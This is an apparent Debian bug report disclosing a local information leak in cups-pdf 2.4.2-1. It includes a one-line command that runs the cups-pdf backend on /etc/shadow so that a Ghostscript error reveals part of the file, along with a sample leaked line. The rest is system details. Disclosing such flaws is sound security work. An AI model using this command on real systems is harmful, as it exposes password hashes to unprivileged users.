Package: cups-pdf Version: 2.4.2-1 Severity: critical Justification: root security hole Tags: security
Unprivileged user can execute /usr/lib/cups/backend/cups-pdf to read parts of any file. End of file is printed by Ghostscript in error report. Execution of this command as unprivileged user /usr/lib/cups/backend/cups-pdf shadow user title 1 '' /etc/shadow will result in Ghostscript error showing last line of /etc/shadow file (possibly containing password hash) ERROR: /undefined in saned:!:13511:0:99999:7::: ... -- System Information: Debian Release: 4.0 APT prefers unstable APT policy: (990, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-albemuth Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8) Versions of packages cups-pdf depends on: ii cupsys 1.2.7-3 Common UNIX Printing System(tm) - ii gs-esp 8.15.3.dfsg.1-1 The Ghostscript PostScript interpr ii libc6 2.3.6.ds1-10 GNU C Library: Shared libraries cups-pdf recommends no packages. -- no debconf information -- Grzegorz Zur -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
